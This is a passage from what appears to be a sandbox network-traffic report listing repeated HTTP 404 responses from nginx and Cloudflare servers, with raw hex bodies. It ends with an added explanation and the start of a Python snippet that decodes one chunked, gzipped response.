b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WBi5HM25E7enDUhJaqU7xdSjqHih%2FJoFVuWCuDtvKpCXnd8kLkuchCW%2FpCMVWvh9dq%2B74vhcKo1nNLQG0hml%2FZT3xvV1%2Fw2x9RH3MgOffCaAaJ%2BjHoyH3SaxwhG40%2FvDeHGgOQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af165b311811-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKCL1WGTcn7vM9epVkZymmt%2FLL%2BGkQUmigAT4BMUFvuQihnl2jUSGJCFnbOG4pytmvpjxYLwi0Eo9SwGHkSB8gcCQnHR9HPLL%2F3yzGxddhuvrZa8JDyva2JSn5ifL5ZTvxNpcb8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af26ab340f65-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zghla1s3RrQE4kuM1%2B3991YIerDBPGjH2R%2BBz6HRD8T9WCJLBenDSLHF20rYFtR8KgMyTdE6rrzQEoCVs88vWIrfFPmO1h9PnqeeljTiqrhw%2BB41r%2ByVTIUCnXTXdIlAgewQeAI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af378bd541e1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4646&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1635&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtvCmy8vM6qq11k%2FxHyaNqMnLNvW354ybLYiIlQYDQEDf%2BVbpPdb%2BoHa0ClLpKhWHEcurvJFwK7FuKiYlHRseloyzTw%2BsDs%2Fgxmsf%2F5hFKlT5KopH5R9NRZbWKM1NzIW%2FVTDoOk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af47ceb143a9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=340&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfbhwjt07m%2BSUxAFwTfjhAKJZh5fc9GJ4lR9Poz%2FPlfqOqlDIhbdY3wRiLnEwVChJ2zGPWpEa3InWM1%2BtXsuT7168fhL93VIE4zJi0PaLIE3ejng4nVdZXQsqoKLWt2mw85KKpfZXmkF191g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af71c8a23300-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=619&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDCHY61NjwdLKUF34ZwERuDzBLZfLMRMQrAaY8XqvTqomcU%2Ft%2BiqhtD4WX6UiXvD9lqXNVanh2XAU23gkqBsrM3h03B8qUlYifo5ZO9Solb0SqGb9HRyyq68sLUZPuD1%2BkCFcSifKWczICT5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af89d93a15a3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=643&delivery_rate=0&cwnd=109&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
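The Cloudflare-fronted 404 responses above (Transfer-Encoding: chunked, Content-Encoding: gzip) appear in the report only as raw hex, so their "Data Ascii" rendering is unreadable. The following Python is an added example, not part of the Joe Sandbox report: it takes one such "Data Raw" dump, strips the HTTP/1.1 chunk framing, gunzips the payload and cross-checks the gzip trailer's recorded uncompressed size against what comes out. The hex is copied verbatim from the 15:23:57 response; the expected page length of 548 bytes is taken from the uncompressed 15:24:05 response from the same host, whose first chunk is sized 0x224, and the assumption that both carry the same nginx 404 page is an inference from those matching sizes, not something the report states.

```python
"""Decode a sandbox "Data Raw" dump of a chunked, gzip-encoded HTTP body."""
import gzip
import struct

# Hex copied verbatim from the 15:23:57 Cloudflare 404 response in the report.
RAW_HEX = (
    "61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 "
    "de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd "
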